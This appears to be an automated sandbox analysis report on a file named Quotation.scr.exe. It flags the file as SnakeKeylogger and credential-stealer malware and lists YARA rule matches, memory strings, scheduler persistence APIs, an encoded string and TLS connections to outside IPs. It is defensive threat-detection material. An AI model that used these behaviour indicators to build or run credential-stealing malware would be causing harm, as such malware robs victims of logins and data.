                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 135.181.160.46:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: initial sampleStatic PE information: Filename: Quotation.scr.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586CCB0 NtProtectVirtualMemory,0_2_0586CCB0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586E1A0 NtResumeThread,0_2_0586E1A0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586CCA9 NtProtectVirtualMemory,0_2_0586CCA9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586E198 NtResumeThread,0_2_0586E198
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0224A9B00_2_0224A9B0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_022467290_2_02246729
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_022467380_2_02246738
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_02246F090_2_02246F09
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_022471880_2_02247188
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578F5EF0_2_0578F5EF
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05785CB90_2_05785CB9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057868A00_2_057868A0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578EFC00_2_0578EFC0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578FA300_2_0578FA30
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057800400_2_05780040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578003B0_2_0578003B
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057853680_2_05785368
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057853590_2_05785359
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578EFB10_2_0578EFB1
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05786E500_2_05786E50
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578FA200_2_0578FA20
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058417B00_2_058417B0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058451F00_2_058451F0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05842DB80_2_05842DB8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05841AD70_2_05841AD7
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05867D800_2_05867D80
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586747E0_2_0586747E
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05869F200_2_05869F20
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058672AB0_2_058672AB
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05861AF80_2_05861AF8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058662780_2_05866278
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866DEB0_2_05866DEB
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05867D700_2_05867D70
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866CAF0_2_05866CAF
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05869F110_2_05869F11
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866F350_2_05866F35
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058667660_2_05866766
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058666B90_2_058666B9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058669960_2_05866996
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058670920_2_05867092
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058670EA0_2_058670EA
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058693B70_2_058693B7
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866BF90_2_05866BF9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586735F0_2_0586735F
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866A290_2_05866A29
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D15460_2_058D1546
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D65670_2_058D6567
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D144B0_2_058D144B
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D14580_2_058D1458
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058DC3C00_2_058DC3C0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058DC3D00_2_058DC3D0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D0BE80_2_058D0BE8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0593ECA00_2_0593ECA0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_059300060_2_05930006
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_059300400_2_05930040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B800060_2_05B80006
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B800400_2_05B80040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B9CB380_2_05B9CB38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DC1462_2_012DC146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D53702_2_012D5370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DD5992_2_012DD599
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DC4682_2_012DC468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DC7382_2_012DC738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D69A02_2_012D69A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DE9902_2_012DE990
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D29E02_2_012D29E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DCA082_2_012DCA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D9DE02_2_012D9DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DCCD82_2_012DCCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DCFA92_2_012DCFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D6FC82_2_012D6FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DE9832_2_012DE983
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DFAC82_2_012DFAC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D3E092_2_012D3E09
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245312531.000000000058E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000000.2115204197.0000000000144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVeoxmodkw.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2253589437.0000000005590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFfxzkbh.dll" vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exeBinary or memory string: OriginalFilenameVeoxmodkw.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, K---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, --R--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, --R--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, K---.csBase64 encoded string: 'UzWebPv57/MVh76TQDG4CbNFpn7XxfirTsBUOsLwJPvNREEYND/Y72ZMmZCNMrPm'
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@4/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                    Source: Quotation.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Quotation.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Quotation.scr.exeVirustotal: Detection: 28%
